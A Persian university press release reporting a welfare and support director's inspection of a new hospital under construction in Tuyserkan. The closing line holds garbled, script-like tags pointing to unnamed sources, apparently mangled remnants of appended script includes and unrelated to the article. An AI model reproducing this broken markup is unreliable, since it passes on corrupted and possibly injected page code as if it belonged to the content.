در بیمارستان جدید التاسیس تویسرکان انجام شد:

بازدید مدیر امور رفاهی و پشتیبانی دانشگاه از بیمارستان جدیدالتاسیس تویسرکان

مدیر امور رفاهی و پشتیبانی دانشگاه از روند ساخت بیمارستان جدیدالتاسیس تویسرکان بازدید کرد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه آقایانی مدیر امور رفاهی به همراهی مدیر بیمارستان ولیعصر(عج) تویسرکان و کارشناسان ستادی مدیریت امور رفاهی و پشتیبانی دانشگاه از بیمارستان جدید التاسیس شهرستان تویسرکان بازدید کردند.

آقایانی مدیر امور رفاهی و پشتیبانی دانشگاه ضمن بازدید از روند ساخت بیمارستان جدیدالتاسیس تویسرکان اظهار داشت: حوزه معاونت توسعه دانشگاه در تلاش است که هر چه زود تر و در موعد مقرر این بیمارستان به بهره برداری برسد تا مردم شریف شهرستان تویسرکان از خدمات درمانی این مرکز بهره مند شوند.

در ادامه از بخش های مختلف بیمارستان از جمله تاسیسات، بخش های داخلی و … بازدید شد و نحوه ساخت و ساز این مرکز مورد بررسی و بازبینی قرار گرفت.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>